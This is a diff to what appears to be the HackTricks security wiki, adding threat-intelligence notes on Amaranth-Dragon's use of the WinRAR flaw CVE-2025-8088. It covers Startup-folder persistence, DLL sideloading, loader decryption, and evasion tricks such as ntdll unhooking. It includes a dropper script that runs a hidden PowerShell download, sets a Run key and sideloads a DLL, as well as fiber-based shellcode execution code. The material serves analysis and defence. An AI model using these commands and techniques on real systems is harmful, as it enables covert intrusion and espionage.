Amaranth-Dragon Weaponizing CVE-2025-8088 for Targeted Espio...

src/generic-hacking/archive-extraction-path-traversal.md

@@ -42,6 +42,14 @@ Options used:
 
 Deliver `evil.rar` to the victim and instruct them to extract it with a vulnerable WinRAR build.
 
+### Weaponised Startup persistence (Amaranth-Dragon)
+
+* Spearphish RAR lures weaponised CVE-2025-8088 to **iterate multiple traversal depths** until the payload lands in the correct Startup folder regardless of where the victim extracts the archive.
+* The dropped file is a **`.cmd`/`.bat`** that runs at next logon and typically:
+  * Downloads a password-protected second-stage RAR from a trusted domain (e.g., Dropbox/actor CDN).
+  * Extracts a **signed EXE + malicious DLL** pair into `C:\Users\Public\Documents\<folder>\`, then sets a **HKCU Run** value and executes the EXE to sideload the DLL.
+* Sandboxes that only unpack the outer archive may **miss the Startup-written script entirely**, so archive statics can appear benign while the persistent script is absent from the analysis artifacts.
+
 ### Observed Exploitation in the Wild
 
 ESET reported RomCom (Storm-0978/UNC2596) spear-phishing campaigns that attached RAR archives abusing CVE-2025-8088 to deploy customised backdoors and facilitate ransomware operations.
@@ -97,5 +105,6 @@ ESET reported RomCom (Storm-0978/UNC2596) spear-phishing campaigns that attached
 
 - [Trend Micro ZDI-25-949 – 7-Zip symlink ZIP traversal (CVE-2025-11001)](https://www.zerodayinitiative.com/advisories/ZDI-25-949/)
 - [JFrog Research – mholt/archiver Zip-Slip (CVE-2025-3445)](https://research.jfrog.com/vulnerabilities/archiver-zip-slip/)
+- [Check Point Research – Amaranth-Dragon weaponises CVE-2025-8088 for targeted espionage](https://research.checkpoint.com/2026/amaranth-dragon-weaponizes-cve-2025-8088-for-targeted-espionage/)
 
 {{#include ../banners/hacktricks-training.md}}

src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md

@@ -491,6 +491,28 @@ Tradecraft notes:
 * Because the executable stays trusted, most allowlisting controls only need your malicious DLL to sit alongside it. Focus on customizing the loader DLL; the signed parent can typically run untouched.
 * ShadowPad’s decryptor expects the TMP blob to live next to the loader and be writable so it can zero the file after mapping. Keep the directory writable until the payload loads; once in memory the TMP file can safely be deleted for OPSEC.
 
+## Amaranth Loader / TGAmaranth sideloading pattern
+
+* Delivery: password-protected RAR/ZIP drops a **signed EXE + malicious DLL** together; the EXE looks for a dependency name (`DllSafeCheck64.dll`, `libcef.dll`, etc.) and executes attacker code from the same folder.
+* Exports: only **one export contains logic**; all other exports point to a stub that immediately `Sleep(INFINITE)` to confuse static/automated triage.
+* Decryption chain: strings/URLs are XOR-decoded at runtime, then the loader fetches an **AES key from a first URL (Pastebin or actor infra, often geo-fenced)** and an **encrypted payload from a second URL**, decrypts with **AES-CBC** using a constant IV `12 34 56 78 90 AB CD EF 34 56 78 90 AB CD EF 12`, allocates `PAGE_EXECUTE_READWRITE`, and runs the shellcode (commonly Havoc).
+* Variants swap Pastebin for Cloudflare-fronted hosts that reply `403` to non-target IPs, and rotate benign-looking **User-Agents** when calling `InternetOpenA`.
+* A later variant decrypts a local shellcode blob with a **non-standard RC4 PRGA** (output byte = `(s[i]+s[j])&0xff` instead of `box[box[i]+box[j]]`), then executes inside a **fiber context** to alter the call stack:
+  ```python
+  def prga(box):
+      j=0
+      for i in range(len(data)):
+          ii=(i+1)&0xff; j=(j+box[ii])&0xff
+          box[ii], box[j] = box[j], box[ii]
+          yield (box[ii]+box[j]) & 0xff
+  ```
+  ```c
+  ConvertThreadToFiber(NULL);
+  LPVOID f = CreateFiber(0, shellcode, NULL);
+  SwitchToFiber(f);
+  ```
+* The TGAmaranth RAT (sideloaded by the same pattern) decrypts a Telegram bot token with the XOR routine, performs **self-debugging via `DebugActiveProcess`** to detect analysts, and **unhooks `ntdll.dll`** by copying a clean `.text` section from a suspended `cmd.exe` into its own process before running commands.
+
 ## References
 
 - [CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe](https://trustedsec.com/blog/cve-2025-1729-privilege-escalation-using-tpqmassistant-exe)
@@ -503,6 +525,7 @@ Tradecraft notes:
 - [Sysinternals Process Monitor](https://learn.microsoft.com/sysinternals/downloads/procmon)
 - [Unit 42 – Digital Doppelgangers: Anatomy of Evolving Impersonation Campaigns Distributing Gh0st RAT](https://unit42.paloaltonetworks.com/impersonation-campaigns-deliver-gh0st-rat/)
 - [Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation](https://research.checkpoint.com/2025/ink-dragons-relay-network-and-offensive-operation/)
+- [Check Point Research – Amaranth-Dragon weaponises CVE-2025-8088 for targeted espionage](https://research.checkpoint.com/2026/amaranth-dragon-weaponizes-cve-2025-8088-for-targeted-espionage/)
 
 
-{{#include ../../../banners/hacktricks-training.md}}
+{{#include ../../../banners/hacktricks-training.md}}

src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md

@@ -48,6 +48,20 @@ Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
 ../../generic-hacking/archive-extraction-path-traversal.md
 {{#endref}}
 
+### Startup dropper chain example (CVE-2025-8088)
+
+A practical abuse seen in 2025 campaigns:
+
+```cmd
+# dropped .cmd inside Startup via path traversal
+powershell -w hidden (New-Object Net.WebClient).DownloadFile(`RAR_URL`, %TEMP%\u.rar)
+rar.exe x -hp`pass` %TEMP%\u.rar C:\Users\Public\Documents\Microsoft\winupdate_v%RANDOM%%TIME:~3,2%\
+reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v `rand` /d `exe_path`
+start "" `exe_path`   # signed host sideloads malicious DLL
+```
+
+Even if the victim only unpacks the archive, the auto-started script will fetch the second stage on reboot/logon, install a Run key, and execute the signed binary that sideloads the attacker DLL.
+
 
 
 ## Registry
@@ -346,6 +360,7 @@ autorunsc.exe -m -nobanner -a * -ct /accepteula
 - [https://attack.mitre.org/techniques/T1547/001/](https://attack.mitre.org/techniques/T1547/001/)
 - [https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2](https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2)
 - [https://www.itprotoday.com/cloud-computing/how-can-i-add-boot-option-starts-alternate-shell](https://www.itprotoday.com/cloud-computing/how-can-i-add-boot-option-starts-alternate-shell)
+- [Check Point Research – Amaranth-Dragon weaponises CVE-2025-8088 for targeted espionage](https://research.checkpoint.com/2026/amaranth-dragon-weaponizes-cve-2025-8088-for-targeted-espionage/)